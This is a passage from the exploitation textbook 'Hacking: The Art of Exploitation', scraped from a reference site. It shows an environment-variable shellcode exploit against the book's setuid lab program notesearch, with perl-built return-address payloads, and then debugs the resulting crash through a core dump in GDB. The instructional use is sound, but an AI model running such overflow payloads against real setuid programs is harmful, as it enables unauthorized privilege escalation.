SHELLCODE - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9c6

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault

r eader@hacking:~/booksrc $

Failure. Why do you think it crashed? In situations like this, GDB is your

best friend. Even if you already know the reason behind this specific crash,

learning how to effectively use a debugger will help you solve many other

problems in the future.

0x522

Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal

user. However, we also can't just attach to a running copy of it, because it

exits too quickly. Another way to debug programs is with core dumps. From a

root prompt, the OS can be told to dump memory when the program crashes

by using the command ulimit -c unlimited . This means that dumped core

files are allowed to get as big as needed. Now, when the program crashes,

the memory will be dumped to disk as a core file, which can be examined

using GDB.

reader@hacking:~/booksrc $ sudo su

root@hacking:/home/reader/booksrc # ulimit -c unlimited

root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)

root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9a3

root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\

xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault (core dumped)

root@hacking:/home/reader/booksrc # ls -l ./core

-rw------- 1 root root 147456 2007-10-26 08:36 ./core

root@hacking:/home/reader/booksrc # gdb -q -c ./core

(no debugging symbols found)

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Core was generated by `./notesearch

£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.

Program terminated with signal 11, Segmentation fault.

#0 0x2c6541b7 in ?? ()

(gdb) set dis intel

(gdb) x/5i 0xbffff9a3

0xbffff9a3: call 0x2c6541b7

0xbffff9a8: ins BYTE PTR es:[edi],[dx]

0xbffff9a9: outs [dx],DWORD PTR ds:[esi]

0xbffff9aa: sub al,0x20

0xbffff9ac: ja 0xbffffa1d

(gdb) i r eip

eip 0x2c6541b7 0x2c6541b7

(gdb) x/32xb 0xbffff9a3

Hacking: The Art of Exploitation

Search WWH ::

Custom Search

Home